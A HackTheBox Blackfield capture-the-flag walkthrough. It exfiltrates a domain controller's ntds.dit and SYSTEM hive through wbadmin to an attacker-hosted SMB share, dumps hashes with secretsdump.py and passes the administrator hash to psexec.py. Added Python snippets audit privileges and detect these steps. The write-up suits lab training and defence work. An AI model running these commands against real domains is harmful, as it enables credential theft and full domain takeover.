
Part 1 - creating an SMB server on Linux or Unix to receive data exfiltrated from another server | NTFS disk | dd command | extracting ntds.dit

This scenario was written while working through the HackTheBox Blackfield box.

After getting access to a system, check what privileges you have by running whoami /all or whoami /priv.

If you see SeBackupPrivilege and SeRestorePrivilege, you can proceed with all the steps below. These two are among the most dangerous privileges, especially inside an AD.
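As an added example (not part of the original post), the following Python parses the table printed by whoami /priv and reports whether the two privileges named above are held, which is the same check an auditor would run over a captured session. The sample output is constructed, not a real capture.

```python
import re

# Privileges this post singles out: either one lets a backup-operator style
# account read files such as ntds.dit regardless of their ACLs.
WATCHED = {"SeBackupPrivilege", "SeRestorePrivilege"}

# Constructed sample of `whoami /priv` output (not a real capture), laid out
# with the real column widths so the parser sees what a shell session shows.
WIDTHS = (29, 36, 8)

def _row(*cells):
    return " ".join(c.ljust(w) for c, w in zip(cells, WIDTHS)).rstrip()

SAMPLE = "\n".join([
    "PRIVILEGES INFORMATION",
    "----------------------",
    "",
    _row("Privilege Name", "Description", "State"),
    _row(*("=" * w for w in WIDTHS)),
    _row("SeMachineAccountPrivilege", "Add workstations to domain", "Disabled"),
    _row("SeBackupPrivilege", "Back up files and directories", "Enabled"),
    _row("SeRestorePrivilege", "Restore files and directories", "Enabled"),
    _row("SeShutdownPrivilege", "Shut down the system", "Disabled"),
    _row("SeChangeNotifyPrivilege", "Bypass traverse checking", "Enabled"),
])

def parse_whoami_priv(text):
    """Return {privilege_name: state}; column offsets come from the
    '====' separator line, so multi-word descriptions never leak into the state."""
    lines = text.splitlines()
    sep = next((i for i, ln in enumerate(lines) if ln.startswith("=")), None)
    if sep is None:
        return {}
    cols = [(m.start(), m.end()) for m in re.finditer(r"=+", lines[sep])]
    privs = {}
    for row in lines[sep + 1:]:
        if not row.strip():
            continue
        name = row[cols[0][0]:cols[0][1]].strip()
        privs[name] = row[cols[-1][0]:].strip()  # state column runs to end of line
    return privs

def held_backup_privileges(text):
    """Watched privileges present in the token, with their state.
    'Disabled' means not currently enabled in the token; the account still
    holds it. Only absence from the list means the account lacks it."""
    privs = parse_whoami_priv(text)
    return {p: privs[p] for p in sorted(WATCHED) if p in privs}
```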

Creating a share on 10.10.10.14 (our system) so that we can pull some data out of an AD that we compromised.

Creating an SMB server in the directory /home/ippsec/blackfield/:


mkdir smb
cd smb
sudo smbserver.py -smb2support SendMeYourData $(pwd)


or


sudo smbserver.py -smb2support -user ippsec -password PleaseSubscribe SendMeYourData $(pwd)
 

The username and password are your own machine's username and password.
SendMeYourData is the share name.
Once you press Enter, it starts listening on port 445.

Now go to the AD host where you have the evil-winrm shell. The scenario is that you compromised the AD and now want to exfiltrate c:\windows\ntds\ from the AD to your own system.
You are connected to the AD with the WinRM shell. Note: in the WinRM shell we need to supply the hash of a powerful user to get access to the system; here we supply the svc_backup user's hash.


*Evil-WinRM* PS C:\Users\svc_backup\Documents> wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\


or 


You can use this command as well if an authentication problem arises:


*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: \\10.10.10.14\SendMeYourData /user:ippsec PleaseSubscribe


PleaseSubscribe is the password.

  
When you run the command above, the task will fail because the backup process asks whether you want to start the backup operation (yes or no). Since you are in a WinRM shell you have no interactive way to type yes, so run the command below instead.

 
*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo y | wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\


But actually the command above will still not start the backup successfully, because wbadmin requires the target volume to be formatted with NTFS/ReFS.

The main task starts from here:


So let's create an NTFS file system on our machine (10.10.10.14); this NTFS file system is what we will mount under the share.
To proceed, go back to your own machine:
ippsec@parrot$
We are going to create a 2 GB NTFS disk image.


dd if=/dev/zero of=ntfs.disk bs=1024M count=2


sudo losetup -fP ntfs.disk


-f is --find (use the first unused loop device) and -P is --partscan (have the kernel scan the image for a partition table, giving a partitioned loop device).


losetup -a 


/dev/loop0: /home/ippsec/htb/blackfield/ntfs.disk


Now the image is attached to /dev/loop0.


Now do the following:


sudo mkfs.ntfs /dev/loop0

 
Now /dev/loop0 should carry an NTFS file system.

 
sudo mount /dev/loop0 smb/   (mounts /dev/loop0 on the /home/ippsec/htb/blackfield/smb/ directory we created earlier)


mount | grep smb


/dev/loop0 on /home/ippsec/htb/blackfield/smb

Now let's run the impacket script again, from your own machine where you set up the SMB server:


sudo smbserver.py -smb2support -user ippsec -password PleaseSubscribe SendMeYourData $(pwd)

From the AD:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo y | wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\

Unfortunately this is also going to fail, because impacket's smbserver.py does not handle this SMB traffic well.

 

OK, now let's do the actual SMB (Samba) configuration, on your host machine:


mkdir /home/ippsec/htb/blackfield/smb/ 


chmod 777 /home/ippsec/htb/blackfield/smb/   (optional)

 
sudo vi /etc/samba/smb.conf   (see line 232)


Add a share section whose name matches the UNC path used from the AD:

[SendMeYourData]
   path = /home/ippsec/htb/blackfield/smb/
   read only = no
   guest ok = yes

(The trailing $ that vi shows at the end of each line on Parrot OS is the editor's end-of-line marker; it is not part of the file, so do not type it.)

 

sudo systemctl restart smbd

*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: /delete   (if a previous share is still mapped)


*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: \\10.10.10.14\SendMeYourData


Now we have x: mapped. Let's try the wbadmin command again.


*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo y | wbadmin start backup -backuptarget:\\10.10.10.14\SendMeYourData  -include:c:\windows\ntds\
 

Hopefully it works now.

Now go to your host machine:


ippsec@parrot$ cd /home/ippsec/htb/blackfield/smb/


watch -n 1 'ls -la'   


You should see WindowsImageBackup created; under it DC01, and under that a .vhdx file. It will take some time to complete.

From the AD:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> net use x: \\10.10.10.14\SendMeYourData   (maps the share so it can be browsed from the AD; this was already done earlier, so check before doing it again)


*Evil-WinRM* PS C:\Users\svc_backup\Documents> x:   (or cd x:\)
dir



Once the backup is done, run the command below to get the version:



*Evil-WinRM* PS C:\Users\svc_backup\Documents> wbadmin get versions

Note down the version identifier, which is

10/02/2020-03:51

*Evil-WinRM* PS C:\Users\svc_backup\Documents> echo Y | wbadmin start recovery -version:10/02/2020-03:51 -itemtype:file -items:C:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl

Recovering the ntds.dit file will take some time because it is fetched from the backup you created. Once done, follow the steps below.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd \

dir

You should see the ntds.dit file.

Now download the file:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> download ntds.dit

ntds.dit is saved in the directory on your own machine that you were last in (your current directory); say you were in /htb/blackfield/.

ntds.dit is the AD domain database, and it is encrypted with a boot key. The boot key is stored in the HKLM\SYSTEM registry hive.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system system.hive

*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system.hive   (now download system.hive as well)
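Every DC-side step above (wbadmin backing up to a UNC path, wbadmin recovering ntds.dit, reg save of the SYSTEM hive) is a process-creation event a defender can alert on. As an added example that is not part of the original post, this Python runs three such rules over constructed 4688-style records (Security event 4688 with command-line auditing enabled) and correlates them per user; the field names and sample records are assumptions.

```python
import re

# Constructed process-creation records shaped like SIEM-stored Security 4688 events
# (not real logs); the first three mirror the commands the post runs on the DC.
EVENTS = [
    {"user": "svc_backup", "process": "C:\\Windows\\System32\\wbadmin.exe",
     "cmd": "wbadmin start backup -backuptarget:\\\\10.10.10.14\\SendMeYourData -include:c:\\windows\\ntds\\"},
    {"user": "svc_backup", "process": "C:\\Windows\\System32\\wbadmin.exe",
     "cmd": "wbadmin start recovery -version:10/02/2020-03:51 -itemtype:file "
            "-items:C:\\windows\\ntds\\ntds.dit -recoverytarget:C:\\ -notrestoreacl"},
    {"user": "svc_backup", "process": "C:\\Windows\\System32\\reg.exe",
     "cmd": "reg save hklm\\system system.hive"},
    # Legitimate-looking activity that must not fire: backup to a local volume
    # and a plain registry query.
    {"user": "backupadmin", "process": "C:\\Windows\\System32\\wbadmin.exe",
     "cmd": "wbadmin start backup -backuptarget:E: -include:C:"},
    {"user": "alice", "process": "C:\\Windows\\System32\\reg.exe",
     "cmd": "reg query hklm\\software\\microsoft\\windows\\currentversion"},
]

# (title, regex on image path, regex on command line); matched case-insensitively.
RULES = [
    ("wbadmin backup sent to a UNC path",
     r"\\wbadmin\.exe$", r"start\s+backup\b.*-backuptarget:\\\\[^\\\s]+\\"),
    ("wbadmin recovery of ntds.dit",
     r"\\wbadmin\.exe$", r"start\s+recovery\b.*ntds\.dit"),
    ("SYSTEM hive exported with reg save",
     r"\\reg\.exe$", r"^reg\s+save\s+hklm\\system\b"),
]

def match_rules(event):
    """Titles of every rule the single event satisfies."""
    return [title for title, proc_re, cmd_re in RULES
            if re.search(proc_re, event["process"], re.I)
            and re.search(cmd_re, event["cmd"], re.I)]

def hits_by_user(events):
    """Map each user to the set of rule titles they triggered."""
    out = {}
    for ev in events:
        for title in match_rules(ev):
            out.setdefault(ev["user"], set()).add(title)
    return out

def full_chain_users(events):
    """Users who triggered all three rules: backup out, restore ntds.dit,
    export SYSTEM hive. Together these reproduce the post's exfiltration."""
    needed = {title for title, _, _ in RULES}
    return sorted(u for u, hits in hits_by_user(events).items() if hits == needed)
```

A single rule firing is worth a look on its own; an account that trips all three within one session has walked the whole chain and should be treated as a credential compromise of the domain.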

Now go to your host machine to run the secretsdump.py tool.

ippsec@parrot$

secretsdump.py -ntds ntds.dit -system system.hive LOCAL

secretsdump.py -ntds ntds.dit -system system.hive -history LOCAL

 

Now you have the administrator hash, so from your host machine launch psexec.py

to access the AD at 10.10.10.192:

ippsec@parrot$

psexec.py -hashes 184fb5e5178480be64824d4cd53b99ee:184fb5e5178480be64824d4cd53b99ee administrator@10.10.10.192

You can pass ntlm:ntlm or lm:ntlm;

the LM portion is not used, psexec.py just requires it to be present.

Now you should have access:
C:\Windows\system32> whoami

nt authority\system

C:\Windows\system32> cd \Users\Administrator\Desktop

dir

type root.txt

See part 2.
